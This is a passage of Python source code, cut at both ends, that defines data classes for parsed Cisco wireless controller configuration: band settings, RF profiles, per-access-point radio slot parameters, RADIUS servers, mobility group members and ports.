'802.11b network config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Band5_Config():\n def __init__(self, name=None):\n self.objname = '5GHz config'\n self.name = '5GHz config'\n self.type = 'config' # defines if class contain operational or config data\n self.d_802_11a_network = None\n self.d_11acsupport = None\n self.d_11nsupport = None\n self.d_11nsupport_802_11a_low_band = None\n self.d_11nsupport_802_11a_mid_band = None\n self.d_11nsupport_802_11a_high_band = None\n self.d_802_11a_operational_rates = None\n self.d_802_11a_operational_rates_802_11a_6m_rate = None\n self.d_802_11a_operational_rates_802_11a_9m_rate = None\n self.d_802_11a_operational_rates_802_11a_12m_rate = None\n self.d_802_11a_operational_rates_802_11a_18m_rate = None\n self.d_802_11a_operational_rates_802_11a_24m_rate = None\n self.d_802_11a_operational_rates_802_11a_36m_rate = None\n self.d_802_11a_operational_rates_802_11a_48m_rate = None\n self.d_802_11a_operational_rates_802_11a_54m_rate = None\n self.d_802_11n_mcs_settings = None\n self.d_802_11n_mcs_settings_mcs_0 = None\n self.d_802_11n_mcs_settings_mcs_1 = None\n self.d_802_11n_mcs_settings_mcs_2 = None\n self.d_802_11n_mcs_settings_mcs_3 = None\n self.d_802_11n_mcs_settings_mcs_4 = None\n self.d_802_11n_mcs_settings_mcs_5 = None\n self.d_802_11n_mcs_settings_mcs_6 = None\n self.d_802_11n_mcs_settings_mcs_7 = None\n self.d_802_11n_mcs_settings_mcs_8 = None\n self.d_802_11n_mcs_settings_mcs_9 = None\n self.d_802_11n_mcs_settings_mcs_10 = None\n self.d_802_11n_mcs_settings_mcs_11 = None\n self.d_802_11n_mcs_settings_mcs_12 = None\n self.d_802_11n_mcs_settings_mcs_13 = None\n self.d_802_11n_mcs_settings_mcs_14 = None\n self.d_802_11n_mcs_settings_mcs_15 = None\n self.d_802_11n_mcs_settings_mcs_16 = None\n self.d_802_11n_mcs_settings_mcs_17 = None\n self.d_802_11n_mcs_settings_mcs_18 = None\n self.d_802_11n_mcs_settings_mcs_19 = None\n self.d_802_11n_mcs_settings_mcs_20 = None\n self.d_802_11n_mcs_settings_mcs_21 = None\n self.d_802_11n_mcs_settings_mcs_22 = None\n self.d_802_11n_mcs_settings_mcs_23 = None\n self.d_802_11n_mcs_settings_mcs_24 = None\n self.d_802_11n_mcs_settings_mcs_25 = None\n self.d_802_11n_mcs_settings_mcs_26 = None\n self.d_802_11n_mcs_settings_mcs_27 = None\n self.d_802_11n_mcs_settings_mcs_28 = None\n self.d_802_11n_mcs_settings_mcs_29 = None\n self.d_802_11n_mcs_settings_mcs_30 = None\n self.d_802_11n_mcs_settings_mcs_31 = None\n self.d_802_11ac_mcs_settings = None\n self.d_802_11ac_mcs_settings_nss_1_mcs_0_9 = None\n self.d_802_11ac_mcs_settings_nss_2_mcs_0_9 = None\n self.d_802_11ac_mcs_settings_nss_3_mcs_0_9 = None\n self.d_802_11ac_mcs_settings_nss_4_mcs_0_7 = None\n self.d_802_11ac_mcs_settings_nss_4_mcs_0_9 = None\n self.d_802_11n_status = None\n self.d_802_11n_status_a_mpdu_tx = None\n self.d_802_11n_status_a_mpdu_tx_priority_0 = None\n self.d_802_11n_status_a_mpdu_tx_priority_1 = None\n self.d_802_11n_status_a_mpdu_tx_priority_2 = None\n self.d_802_11n_status_a_mpdu_tx_priority_3 = None\n self.d_802_11n_status_a_mpdu_tx_priority_4 = None\n self.d_802_11n_status_a_mpdu_tx_priority_5 = None\n self.d_802_11n_status_a_mpdu_tx_priority_6 = None\n self.d_802_11n_status_a_mpdu_tx_priority_7 = None\n self.d_802_11n_status_a_mpdu_tx_aggregation_scheduler = None\n self.d_802_11n_status_a_mpdu_tx_frame_burst = None\n self.d_802_11n_status_a_mpdu_tx_frame_burst_realtime_timeout = None\n self.d_802_11n_status_a_mpdu_tx_frame_burst_non_realtime_timeout = None\n self.d_802_11n_status_a_msdu_tx = None\n self.d_802_11n_status_a_msdu_tx_priority_0 = None\n self.d_802_11n_status_a_msdu_tx_priority_1 = None\n self.d_802_11n_status_a_msdu_tx_priority_2 = None\n self.d_802_11n_status_a_msdu_tx_priority_3 = None\n self.d_802_11n_status_a_msdu_tx_priority_4 = None\n self.d_802_11n_status_a_msdu_tx_priority_5 = None\n self.d_802_11n_status_a_msdu_tx_priority_6 = None\n self.d_802_11n_status_a_msdu_tx_priority_7 = None\n self.d_802_11n_status_a_msdu_max_subframes = None\n self.d_802_11n_status_a_msdu_max_length = None\n self.d_802_11n_status_rifs_rx = None\n self.d_802_11n_status_guard_interval = None\n self.beacon_interval = None\n self.cf_pollable_mandatory = None\n self.cf_poll_request_mandatory = None\n self.cfp_period = None\n self.cfp_maximum_duration = None\n self.default_channel = None\n self.default_tx_power_level = None\n self.dtpc_status = None\n self.fragmentation_threshold = None\n self.rssi_low_check = None\n self.rssi_threshold = None\n self.ti_threshold = None\n self.legacy_tx_beamforming_setting = None\n self.traffic_stream_metrics_status = None\n self.expedited_bw_request_status = None\n self.world_mode = None\n self.dfs_peakdetect = None\n self.edca_profile_type = None\n self.voice_mac_optimization_status = None\n self.call_admission_control_cac_configuration = None\n self.voice_ac = None\n self.voice_ac_voice_ac_admission_control_acm = None\n self.voice_ac_voice_stream_size = None\n self.voice_ac_voice_max_streams = None\n self.voice_ac_voice_max_rf_bandwidth = None\n self.voice_ac_voice_reserved_roaming_bandwidth = None\n self.voice_ac_voice_cac_method = None\n self.voice_ac_voice_tspec_inactivity_timeout = None\n self.cac_sip_voice_configuration = None\n self.cac_sip_voice_configuration_sip_based_cac = None\n self.cac_sip_voice_configuration_sip_codec_type = None\n self.cac_sip_voice_configuration_sip_call_bandwidth = None\n self.cac_sip_voice_configuration_sip_call_bandwith_sample_size = None\n self.video_ac = None\n self.video_ac_video_ac_admission_control_acm = None\n self.video_ac_video_max_rf_bandwidth = None\n self.video_ac_video_reserved_roaming_bandwidth = None\n self.video_ac_video_load_based_cac_mode = None\n self.video_ac_video_cac_method = None\n self.cac_sip_video_configuration = None\n self.cac_sip_video_configuration_sip_based_cac = None\n self.cac_sip_video_configuration_best_effort_ac_admission_control_acm = None\n self.cac_sip_video_configuration_background_ac_admission_control_acm = None\n self.maximum_number_of_clients_per_ap_radio = None\n self.l2roam_802_11a_rf_parameters = None\n self.l2roam_802_11a_rf_parameters_config_mode = None\n self.l2roam_802_11a_rf_parameters_minimum_rssi = None\n self.l2roam_802_11a_rf_parameters_roam_hysteresis = None\n self.l2roam_802_11a_rf_parameters_scan_threshold = None\n self.l2roam_802_11a_rf_parameters_transition_time = None\n self.d_802_11h_configuration = None\n self.power_constraint = None\n self.channel_switch = None\n self.channel_mode = None\n self.smart_dfs = None\n\n def __str__(self):\n return '802.11a network config'\n\n def __repr__(self):\n return '802.11a network config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Rf_Profile():\n def __init__(self, name=None):\n self.objname = 'RF profile'\n self.name = None\n self.type = 'config'\n self.rf_profile_name = None\n self.description = None\n self.ap_group_name = None\n self.radio_policy = None\n self.d_11n_client_only = None\n self.transmit_power_threshold_v1 = None\n self.transmit_power_threshold_v2 = None\n self.min_transmit_power = None\n self.max_transmit_power = None\n self.d_802_11b_g_operational_rates = None\n self.d_802_11b_g_operational_rates_802_11b_g_1m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_2m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_5_5m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_11m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_6m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_9m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_12m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_18m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_24m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_36m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_48m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_54m_rate = None\n self.d_802_11a_operational_rates = None\n self.d_802_11a_operational_rates_802_11a_6m_rate = None\n self.d_802_11a_operational_rates_802_11a_9m_rate = None\n self.d_802_11a_operational_rates_802_11a_12m_rate = None\n self.d_802_11a_operational_rates_802_11a_18m_rate = None\n self.d_802_11a_operational_rates_802_11a_24m_rate = None\n self.d_802_11a_operational_rates_802_11a_36m_rate = None\n self.d_802_11a_operational_rates_802_11a_48m_rate = None\n self.d_802_11a_operational_rates_802_11a_54m_rate = None\n self.trap_threshold = None\n self.trap_threshold_clients = None\n self.trap_threshold_interference = None\n self.trap_threshold_noise = None\n self.trap_threshold_utilization = None\n self.multicast_data_rate = None\n self.rx_sop_threshold = None\n self.cca_threshold = None\n self.slot_admin_state = None\n self.client_aware_fra = None\n self.client_aware_fra_state = None\n self.client_aware_fra_client_select_utilization_threshold = None\n self.client_aware_fra_client_reset_utilization_threshold = None\n self.band_select = None\n self.band_select_probe_response = None\n self.band_select_cycle_count = None\n self.band_select_cycle_threshold = None\n self.band_select_expire_suppression = None\n self.band_select_expire_dual_band = None\n self.band_select_client_rssi = None\n self.band_select_client_mid_rssi = None\n self.load_balancing = None\n self.load_balancing_denial = None\n self.load_balancing_window = None\n self.coverage_data = None\n self.coverage_data_data = None\n self.coverage_data_voice = None\n self.coverage_data_minimum_client_level = None\n self.coverage_data_exception_level = None\n self.dca_channel_list = None\n self.dca_bandwidth = None\n self.dca_foreign_ap_contribution = None\n self.d_802_11n_mcs_rates = None\n self.d_802_11n_mcs_rates_mcs_00_rate = None\n self.d_802_11n_mcs_rates_mcs_01_rate = None\n self.d_802_11n_mcs_rates_mcs_02_rate = None\n self.d_802_11n_mcs_rates_mcs_03_rate = None\n self.d_802_11n_mcs_rates_mcs_04_rate = None\n self.d_802_11n_mcs_rates_mcs_05_rate = None\n self.d_802_11n_mcs_rates_mcs_06_rate = None\n self.d_802_11n_mcs_rates_mcs_07_rate = None\n self.d_802_11n_mcs_rates_mcs_08_rate = None\n self.d_802_11n_mcs_rates_mcs_09_rate = None\n self.d_802_11n_mcs_rates_mcs_10_rate = None\n self.d_802_11n_mcs_rates_mcs_11_rate = None\n self.d_802_11n_mcs_rates_mcs_12_rate = None\n self.d_802_11n_mcs_rates_mcs_13_rate = None\n self.d_802_11n_mcs_rates_mcs_14_rate = None\n self.d_802_11n_mcs_rates_mcs_15_rate = None\n self.d_802_11n_mcs_rates_mcs_16_rate = None\n self.d_802_11n_mcs_rates_mcs_17_rate = None\n self.d_802_11n_mcs_rates_mcs_18_rate = None\n self.d_802_11n_mcs_rates_mcs_19_rate = None\n self.d_802_11n_mcs_rates_mcs_20_rate = None\n self.d_802_11n_mcs_rates_mcs_21_rate = None\n self.d_802_11n_mcs_rates_mcs_22_rate = None\n self.d_802_11n_mcs_rates_mcs_23_rate = None\n self.d_802_11n_mcs_rates_mcs_24_rate = None\n self.d_802_11n_mcs_rates_mcs_25_rate = None\n self.d_802_11n_mcs_rates_mcs_26_rate = None\n self.d_802_11n_mcs_rates_mcs_27_rate = None\n self.d_802_11n_mcs_rates_mcs_28_rate = None\n self.d_802_11n_mcs_rates_mcs_29_rate = None\n self.d_802_11n_mcs_rates_mcs_30_rate = None\n self.d_802_11n_mcs_rates_mcs_31_rate = None\n self.client_network_preference = None\n\n def update_name(self):\n self.name = self.rf_profile_name\n\n def __str__(self):\n return 'RF profile ' + self.name\n\n def __repr__(self):\n return 'RF profile ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Config():\n def __init__(self, name=None):\n self.objname = 'AP Config'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.cisco_ap_identifier = None\n self.cisco_ap_name = None\n self.country_code = None\n self.regulatory_domain_allowed_by_country = None\n self.ap_country_code = None\n self.wireless_logging_state = None\n self.ap_regulatory_domain = None\n self.switch_port_number = None\n self.mac_address = None\n self.ip_address_configuration = None\n self.ip_address = None\n self.ip_netmask = None\n self.gateway_ip_addr = None\n self.nat_external_ip_address = None\n self.capwap_path_mtu = None\n self.dhcp_release_override = None\n self.telnet_state = None\n self.ssh_state = None\n self.cisco_ap_location = None\n self.cisco_ap_floor_label = None\n self.cisco_ap_group_name = None\n self.primary_cisco_switch_name = None\n self.primary_cisco_switch_ip_address = None\n self.secondary_cisco_switch_name = None\n self.secondary_cisco_switch_ip_address = None\n self.tertiary_cisco_switch_name = None\n self.tertiary_cisco_switch_ip_address = None\n self.administrative_state = None\n self.operation_state = None\n self.mirroring_mode = None\n self.ap_mode = None\n self.public_safety = None\n self.atf_mode = None\n self.ap_submode = None\n self.rogue_detection = None\n self.remote_ap_debug = None\n self.logging_trap_severity_level = None\n self.logging_syslog_facility = None\n self.s_w_version = None\n self.boot_version = None\n self.mini_ios_version = None\n self.stats_reporting_period = None\n self.stats_collection_mode = None\n self.radio_core_mode = None\n self.slub_debug_mode = None\n self.led_state = None\n self.poe_pre_standard_switch = None\n self.poe_power_injector_mac_addr = None\n self.power_type_mode = None\n self.number_of_slots = None\n self.ap_model = None\n self.ap_image = None\n self.ios_version = None\n self.reset_button = None\n self.ap_serial_number = None\n self.ap_certificate_type = None\n self.ap_lag_status = None\n self.ap_user_mode = None\n self.ap_user_name = None\n self.ap_dot1x_user_mode = None\n self.ap_dot1x_user_name = None\n self.cisco_ap_system_logging_host = None\n self.ap_core_dump_config = None\n self.ap_up_time = None\n self.ap_lwapp_up_time = None\n self.join_date_and_time = None\n self.join_taken_time = None\n self.slot_0 = None\n self.slot_0_radio_type = None\n self.slot_0_administrative_state = None\n self.slot_0_operation_state = None\n self.slot_0_mesh_radio_role = None\n self.slot_0_radio_role = None\n self.slot_0_radio_subtype = None\n self.slot_0_radio_role_assignment_method = None\n self.slot_0_radio_role_band = None\n self.slot_0_phy_dsss_parameters_current_cca_mode = None\n self.slot_0_phy_dsss_parameters_ed_threshold = None\n self.slot_0_operation_rate_set_6000_kilo_bits = None\n self.slot_0_operation_rate_set_9000_kilo_bits = None\n self.slot_0_operation_rate_set_5500_kilo_bits = None\n self.slot_0_operation_rate_set_1000_kilo_bits = None\n self.slot_0_operation_rate_set_2000_kilo_bits = None\n self.slot_0_cellid = None\n self.slot_0_station_configuration = None\n self.slot_0_configuration = None\n self.slot_0_number_of_wlans = None\n self.slot_0_medium_occupancy_limit = None\n self.slot_0_cfp_period = None\n self.slot_0_cfp_maxduration = None\n self.slot_0_bssid = None\n self.slot_0_operation_rate_set = None\n self.slot_0_operation_rate_set_11000_kilo_bits = None\n self.slot_0_operation_rate_set_12000_kilo_bits = None\n self.slot_0_operation_rate_set_18000_kilo_bits = None\n self.slot_0_operation_rate_set_24000_kilo_bits = None\n self.slot_0_operation_rate_set_36000_kilo_bits = None\n self.slot_0_operation_rate_set_48000_kilo_bits = None\n self.slot_0_operation_rate_set_54000_kilo_bits = None\n self.slot_0_mcs_set = None\n self.slot_0_mcs_set_mcs_0 = None\n self.slot_0_mcs_set_mcs_1 = None\n self.slot_0_mcs_set_mcs_2 = None\n self.slot_0_mcs_set_mcs_3 = None\n self.slot_0_mcs_set_mcs_4 = None\n self.slot_0_mcs_set_mcs_5 = None\n self.slot_0_mcs_set_mcs_6 = None\n self.slot_0_mcs_set_mcs_7 = None\n self.slot_0_mcs_set_mcs_8 = None\n self.slot_0_mcs_set_mcs_9 = None\n self.slot_0_mcs_set_mcs_10 = None\n self.slot_0_mcs_set_mcs_11 = None\n self.slot_0_mcs_set_mcs_12 = None\n self.slot_0_mcs_set_mcs_13 = None\n self.slot_0_mcs_set_mcs_14 = None\n self.slot_0_mcs_set_mcs_15 = None\n self.slot_0_mcs_set_mcs_16 = None\n self.slot_0_mcs_set_mcs_17 = None\n self.slot_0_mcs_set_mcs_18 = None\n self.slot_0_mcs_set_mcs_19 = None\n self.slot_0_mcs_set_mcs_20 = None\n self.slot_0_mcs_set_mcs_21 = None\n self.slot_0_mcs_set_mcs_22 = None\n self.slot_0_mcs_set_mcs_23 = None\n self.slot_0_mcs_set_mcs_24 = None\n self.slot_0_mcs_set_mcs_25 = None\n self.slot_0_mcs_set_mcs_26 = None\n self.slot_0_mcs_set_mcs_27 = None\n self.slot_0_mcs_set_mcs_28 = None\n self.slot_0_mcs_set_mcs_29 = None\n self.slot_0_mcs_set_mcs_30 = None\n self.slot_0_mcs_set_mcs_31 = None\n self.slot_0_802_11ac_mcs_set = None\n self.slot_0_802_11ac_mcs_set_nss_1_mcs_0_9 = None\n self.slot_0_802_11ac_mcs_set_nss_2_mcs_0_9 = None\n self.slot_0_802_11ac_mcs_set_nss_3_mcs_0_9 = None\n self.slot_0_802_11ac_mcs_set_nss_4_mcs_0_7 = None\n self.slot_0_phy_dsss_parameters = None\n self.slot_0_containment_count_rogue_bssid = None\n self.slot_0_containment_count_rogue_bssid_containment_type = None\n self.slot_0_containment_count_rogue_bssid_channel_count = None\n self.slot_0_beacon_period = None\n self.slot_0_fragmentation_threshold = None\n self.slot_0_multi_domain_capability_implemented = None\n self.slot_0_multi_domain_capability_enabled = None\n self.slot_0_country_string = None\n self.slot_0_multi_domain_capability = None\n self.slot_0_multi_domain_capability_configuration = None\n self.slot_0_multi_domain_capability_first_chan_num = None\n self.slot_0_multi_domain_capability_number_of_channels = None\n self.slot_0_mac_operation_parameters = None\n self.slot_0_mac_operation_parameters_configuration = None\n self.slot_0_mac_operation_parameters_fragmentation_threshold = None\n self.slot_0_mac_operation_parameters_packet_retry_limit = None\n self.slot_0_tx_power = None\n self.slot_0_tx_power_num_of_supported_power_levels = None\n self.slot_0_tx_power_tx_power_level_1 = None\n self.slot_0_tx_power_tx_power_level_2 = None\n self.slot_0_tx_power_tx_power_level_3 = None\n self.slot_0_tx_power_tx_power_level_4 = None\n self.slot_0_tx_power_tx_power_level_5 = None\n self.slot_0_tx_power_tx_power_level_6 = None\n self.slot_0_tx_power_tx_power_level_7 = None\n self.slot_0_tx_power_tx_power_level_8 = None\n self.slot_0_tx_power_tx_power_configuration = None\n self.slot_0_tx_power_current_tx_power_level = None\n self.slot_0_tx_power_tx_power_assigned_by = None\n self.slot_0_phy_ofdm_parameters = None\n self.slot_0_phy_ofdm_parameters_configuration = None\n self.slot_0_phy_ofdm_parameters_current_channel = None\n self.slot_0_phy_ofdm_parameters_channel_assigned_by = None\n self.slot_0_phy_ofdm_parameters_extension_channel = None\n self.slot_0_phy_ofdm_parameters_channel_width = None\n self.slot_0_phy_ofdm_parameters_allowed_channel_list = None\n self.slot_0_phy_ofdm_parameters_allowed_channel_list_ = None\n self.slot_0_phy_ofdm_parameters_ti_threshold = None\n self.slot_0_phy_ofdm_parameters_dca_channel_list = None\n self.slot_0_phy_ofdm_parameters_legacy_tx_beamforming_configuration = None\n self.slot_0_phy_ofdm_parameters_legacy_tx_beamforming = None\n self.slot_0_phy_ofdm_parameters_antenna_type = None\n self.slot_0_phy_ofdm_parameters_internal_antenna_gain_in_5_dbi_units = None\n self.slot_0_phy_ofdm_parameters_diversity = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas_a = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas_b = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas_c = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas_d = None\n self.slot_0_performance_profile_parameters = None\n self.slot_0_performance_profile_parameters_configuration = None\n self.slot_0_performance_profile_parameters_interference_threshold = None\n self.slot_0_performance_profile_parameters_noise_threshold = None\n self.slot_0_performance_profile_parameters_rf_utilization_threshold = None\n self.slot_0_performance_profile_parameters_data_rate_threshold = None\n self.slot_0_performance_profile_parameters_client_threshold = None\n self.slot_0_performance_profile_parameters_coverage_snr_threshold = None\n self.slot_0_performance_profile_parameters_coverage_exception_level = None\n self.slot_0_performance_profile_parameters_client_minimum_exception_level = None\n self.slot_0_rogue_containment_information = None\n self.slot_0_containment_count = None\n self.slot_0_cleanair_management_information = None\n self.slot_0_cleanair_management_information_cleanair_capable = None\n self.slot_0_cleanair_management_information_cleanair_management_administration_st = None\n self.slot_0_cleanair_management_information_cleanair_management_operation_state = None\n self.slot_0_cleanair_management_information_rapid_update_mode = None\n self.slot_0_cleanair_management_information_spectrum_expert_connection = None\n self.slot_0_cleanair_management_information_spectrum_expert_connection_cleanair_nsi_key = None\n self.slot_0_cleanair_management_information_spectrum_expert_connection_spectrum_expert_connections_counter = None\n self.slot_0_cleanair_management_information_cleanair_sensor_state = None\n self.slot_0_radio_extended_configurations = None\n self.slot_0_radio_extended_configurations_beacon_period = None\n self.slot_0_radio_extended_configurations_beacon_range = None\n self.slot_0_radio_extended_configurations_multicast_buffer = None\n self.slot_0_radio_extended_configurations_multicast_data_rate = None\n self.slot_0_radio_extended_configurations_rx_sop_threshold = None\n self.slot_0_radio_extended_configurations_cca_threshold = None\n self.slot_1 = None\n self.slot_1_radio_type = None\n self.slot_1_radio_subband = None\n self.slot_1_administrative_state = None\n self.slot_1_operation_state = None\n self.slot_1_mesh_radio_role = None\n self.slot_1_radio_role = None\n self.slot_1_cellid = None\n self.slot_1_station_configuration = None\n self.slot_1_configuration = None\n self.slot_1_number_of_wlans = None\n self.slot_1_medium_occupancy_limit = None\n self.slot_1_cfp_period = None\n self.slot_1_cfp_maxduration = None\n self.slot_1_bssid = None\n self.slot_1_operation_rate_set = None\n self.slot_1_operation_rate_set_6000_kilo_bits = None\n self.slot_1_operation_rate_set_9000_kilo_bits = None\n self.slot_1_operation_rate_set_12000_kilo_bits = None\n self.slot_1_operation_rate_set_18000_kilo_bits = None\n self.slot_1_operation_rate_set_24000_kilo_bits = None\n self.slot_1_operation_rate_set_36000_kilo_bits = None\n self.slot_1_operation_rate_set_48000_kilo_bits = None\n self.slot_1_operation_rate_set_54000_kilo_bits = None\n self.slot_1_mcs_set = None\n self.slot_1_mcs_set_mcs_0 = None\n self.slot_1_mcs_set_mcs_3 = None\n self.slot_1_mcs_set_mcs_4 = None\n self.slot_1_mcs_set_mcs_5 = None\n self.slot_1_mcs_set_mcs_6 = None\n self.slot_1_mcs_set_mcs_7 = None\n self.slot_1_mcs_set_mcs_8 = None\n self.slot_1_mcs_set_mcs_9 = None\n self.slot_1_mcs_set_mcs_10 = None\n self.slot_1_mcs_set_mcs_11 = None\n self.slot_1_mcs_set_mcs_12 = None\n self.slot_1_mcs_set_mcs_13 = None\n self.slot_1_mcs_set_mcs_14 = None\n self.slot_1_mcs_set_mcs_15 = None\n self.slot_1_mcs_set_mcs_16 = None\n self.slot_1_mcs_set_mcs_17 = None\n self.slot_1_mcs_set_mcs_18 = None\n self.slot_1_mcs_set_mcs_19 = None\n self.slot_1_mcs_set_mcs_20 = None\n self.slot_1_mcs_set_mcs_21 = None\n self.slot_1_mcs_set_mcs_22 = None\n self.slot_1_mcs_set_mcs_23 = None\n self.slot_1_mcs_set_mcs_24 = None\n self.slot_1_mcs_set_mcs_25 = None\n self.slot_1_mcs_set_mcs_26 = None\n self.slot_1_mcs_set_mcs_27 = None\n self.slot_1_mcs_set_mcs_28 = None\n self.slot_1_mcs_set_mcs_29 = None\n self.slot_1_mcs_set_mcs_30 = None\n self.slot_1_mcs_set_mcs_31 = None\n self.slot_1_802_11ac_mcs_set = None\n self.slot_1_802_11ac_mcs_set_nss_1_mcs_0_9 = None\n self.slot_1_802_11ac_mcs_set_nss_2_mcs_0_9 = None\n self.slot_1_802_11ac_mcs_set_nss_3_mcs_0_9 = None\n self.slot_1_802_11ac_mcs_set_nss_4_mcs_0_9 = None\n self.slot_1_802_11ac_mcs_set_nss_4_mcs_0_7 = None\n self.slot_1_beacon_period = None\n self.slot_1_fragmentation_threshold = None\n self.slot_1_multi_domain_capability_implemented = None\n self.slot_1_multi_domain_capability_enabled = None\n self.slot_1_country_string = None\n self.slot_1_multi_domain_capability = None\n self.slot_1_multi_domain_capability_configuration = None\n self.slot_1_multi_domain_capability_first_chan_num = None\n self.slot_1_multi_domain_capability_number_of_channels = None\n self.slot_1_mac_operation_parameters = None\n self.slot_1_mac_operation_parameters_configuration = None\n self.slot_1_mac_operation_parameters_fragmentation_threshold = None\n self.slot_1_mac_operation_parameters_packet_retry_limit = None\n self.slot_1_tx_power = None\n self.slot_1_tx_power_num_of_supported_power_levels = None\n self.slot_1_tx_power_tx_power_level_1 = None\n self.slot_1_tx_power_tx_power_level_2 = None\n self.slot_1_tx_power_tx_power_level_3 = None\n self.slot_1_tx_power_tx_power_level_4 = None\n self.slot_1_tx_power_tx_power_level_5 = None\n self.slot_1_tx_power_tx_power_level_6 = None\n self.slot_1_tx_power_tx_power_level_7 = None\n self.slot_1_tx_power_tx_power_level_8 = None\n self.slot_1_tx_power_tx_power_configuration = None\n self.slot_1_tx_power_current_tx_power_level = None\n self.slot_1_tx_power_tx_power_assigned_by = None\n self.slot_1_phy_ofdm_parameters = None\n self.slot_1_phy_ofdm_parameters_configuration = None\n self.slot_1_phy_ofdm_parameters_current_channel = None\n self.slot_1_phy_ofdm_parameters_channel_assigned_by = None\n self.slot_1_phy_ofdm_parameters_extension_channel = None\n self.slot_1_phy_ofdm_parameters_channel_width = None\n self.slot_1_phy_ofdm_parameters_allowed_channel_list = None\n self.slot_1_phy_ofdm_parameters_allowed_channel_list_ = None\n self.slot_1_phy_ofdm_parameters_ti_threshold = None\n self.slot_1_phy_ofdm_parameters_dca_channel_list = None\n self.slot_1_phy_ofdm_parameters_legacy_tx_beamforming_configuration = None\n self.slot_1_phy_ofdm_parameters_legacy_tx_beamforming = None\n self.slot_1_phy_ofdm_parameters_antenna_type = None\n self.slot_1_phy_ofdm_parameters_internal_antenna_gain_in_5_dbi_units = None\n self.slot_1_phy_ofdm_parameters_diversity = None\n self.slot_1_phy_ofdm_parameters_802_11n_antennas = None\n self.slot_1_phy_ofdm_parameters_802_11n_antennas_a = None\n self.slot_1_phy_ofdm_parameters_802_11n_antennas_b = None\n self.slot_1_phy_ofdm_parameters_802_11n_antennas_c = None\n self.slot_1_phy_ofdm_parameters_802_11n_antennas_d = None\n self.slot_1_performance_profile_parameters = None\n self.slot_1_performance_profile_parameters_interference_threshold = None\n self.slot_1_performance_profile_parameters_noise_threshold = None\n self.slot_1_performance_profile_parameters_rf_utilization_threshold = None\n self.slot_1_performance_profile_parameters_data_rate_threshold = None\n self.slot_1_performance_profile_parameters_client_threshold = None\n self.slot_1_performance_profile_parameters_coverage_snr_threshold = None\n self.slot_1_performance_profile_parameters_coverage_exception_level = None\n self.slot_1_performance_profile_parameters_client_minimum_exception_level = None\n self.slot_1_rogue_containment_information = None\n self.slot_1_containment_count = None\n self.slot_1_cleanair_management_information = None\n self.slot_1_cleanair_management_information_cleanair_capable = None\n self.slot_1_cleanair_management_information_cleanair_management_administration_st = None\n self.slot_1_cleanair_management_information_cleanair_management_operation_state = None\n self.slot_1_cleanair_management_information_rapid_update_mode = None\n self.slot_1_cleanair_management_information_spectrum_expert_connection = None\n self.slot_1_cleanair_management_information_spectrum_expert_connection_cleanair_nsi_key = None\n self.slot_1_cleanair_management_information_spectrum_expert_connection_spectrum_expert_connections_counter = None\n self.slot_1_cleanair_management_information_cleanair_sensor_state = None\n self.slot_1_radio_extended_configurations = None\n self.slot_1_radio_extended_configurations_beacon_period = None\n self.slot_1_radio_extended_configurations_beacon_range = None\n self.slot_1_radio_extended_configurations_multicast_buffer = None\n self.slot_1_radio_extended_configurations_multicast_data_rate = None\n self.slot_1_radio_extended_configurations_rx_sop_threshold = None\n self.slot_1_radio_extended_configurations_cca_threshold = None\n\n def update_name(self):\n self.name = self.cisco_ap_name\n\n def __str__(self):\n return 'AP config for ' + self.name\n\n def __repr__(self):\n return 'AP config for ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Radius_Authentication_Server():\n def __init__(self, name=None):\n self.objname = 'RADIUS Authentication server'\n self.name = None\n self.type = None\n self.id = None\n self.ip_address = None\n self.port = None\n self.state = None\n self.timeout = None\n self.mgmt_timeout = None\n self.rfc3576 = None\n self.ipsec = None\n\n def update_name(self):\n self.name = self.id\n\n def get_one_item(self):\n return Radius_Authentication_Server()\n\n def __str__(self):\n return 'RADIUS AUTH server ' + self.name\n\n def __repr__(self):\n return 'RADIUS AUTH server ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Radius_Accounting_Server():\n def __init__(self, name=None):\n self.objname = 'RADIUS Accounting server'\n self.name = None\n self.type = None\n self.id = None\n self.ip_address = None\n self.port = None\n self.state = None\n self.timeout = None\n self.mgmt_timeout = None\n self.rfc3576 = None\n self.ipsec = None\n\n def update_name(self):\n self.name = self.id\n\n def get_one_item(self):\n return Radius_Accounting_Server()\n\n def __str__(self):\n return 'RADIUS ACCT server ' + self.name\n\n def __repr__(self):\n return 'RADIUS ACCT server ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Mobility_Group_Member():\n def __init__(self, name=None):\n self.objname = 'Mobility group member'\n self.name = None\n self.mac_address = None\n self.ip_address = None\n self.mobility_group_name = None\n self.multicast_ip = None\n self.state = None\n\n def update_name(self):\n self.name = self.ip_address\n\n def get_one_item(self):\n return Mobility_Group_Member()\n\n def __str__(self):\n return 'Mobility group member ' + self.name\n\n def __repr__(self):\n return 'Mobility group member ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Port():\n def __init__(self, name=None):\n self.objname = 'Port Information'\n self.name = None\n self.number = None\n self.type = None\n self.stp_state = None\n self.admin_mode = None\n self.phy_mode = None\n self.phy_status = None\n self.link_status = None\n self.link_trap = None\n self.poe = None\n self.sfp_type = None\n\n def update_name(self):\n self.name 